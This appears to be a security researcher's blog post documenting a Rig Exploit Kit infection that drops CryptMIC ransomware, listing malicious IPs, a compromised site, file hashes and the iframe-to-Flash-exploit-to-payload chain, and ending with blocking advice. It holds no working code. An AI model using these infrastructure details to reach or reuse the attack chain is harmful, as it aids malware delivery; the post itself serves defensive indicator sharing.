Rig EK at 91.121.208.103 Drops CryptMIC

IOCs:

  • 65.254.227.224 – zurnyachts[.]com – Compromised Site
  • 91.121.208.103 – butterteigenpassionisten.loganslittleangels.org – Rig EK
  • 91.121.74.154 – CryptMIC post-infection traffic via TCP port 443

Traffic:

traffic

Video of Infection:

Sorry in advance if you don’t like my music selection! I will take song requests for $10! 😉

Hashes:

  1. SHA256: 00895735b2297cd73b723f27120bd86c56957e069156050a8eabf3e8a3811fa4
    File name: RigEK Landing Page.html
  2. SHA256: dbb2d959adc4986c43b6e9279d90ceb55a3b1686a0ac229575dc0f8dcac2e26f
    File name: RigEK Flash Exploit.swf
  3. SHA256: e1c7071c4449b043d2d57f6501f463481f79b49e2cc4f75b4df5acf862b03f4d
    File name: radA5147.tmp.exe

Infection Chain:

The infection starts out with the user (that would be me) browsing to a compromised website. In this case that website was zurnyachts[.]com (DO NOT GO TO THAT SITE). Within the site is a script from a campaign known as “pseudoDarkleech”. The script is very easy to spot when you know what you’re looking for. In this example it was at the very top of the source code, above the <html> tags. Here is a picture of the script on the site:

pseudodarkleech-script

Once the browser loads the compromised website the URL within the pseudoDarkleech iframe causes a GET request to the Rig Exploit Kit landing page. At this point you’re off to the races. Here is the GET request for said landing page:

rigek-landing-page

The landing page is being obfuscated and encoded. However, it would be at this point that the system would receive instructions to download a Flash exploit. Below is the GET request for a Flash exploit:

rigek-flash-exploit

If successful the payload will follow. In this instance we see it dropping an executable into %TEMP%:

rigek-payload

temp

In the video you can see the executable being proceeded by a .js file. You can also see me trying to quickly copy it for fun but I failed to do before it deleted itself.

I also want to mention that even though the payload was delivered to the host there seems to have been an error. Somewhere along the way it failed to encrypt my files. In any case, you can see the ransom notes being dropped in %TEMP% and on the Desktop.

My recommendation would be to block the compromised website (for maybe a month or until it gets cleaned) and Rig EK IP on enterprise networks.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: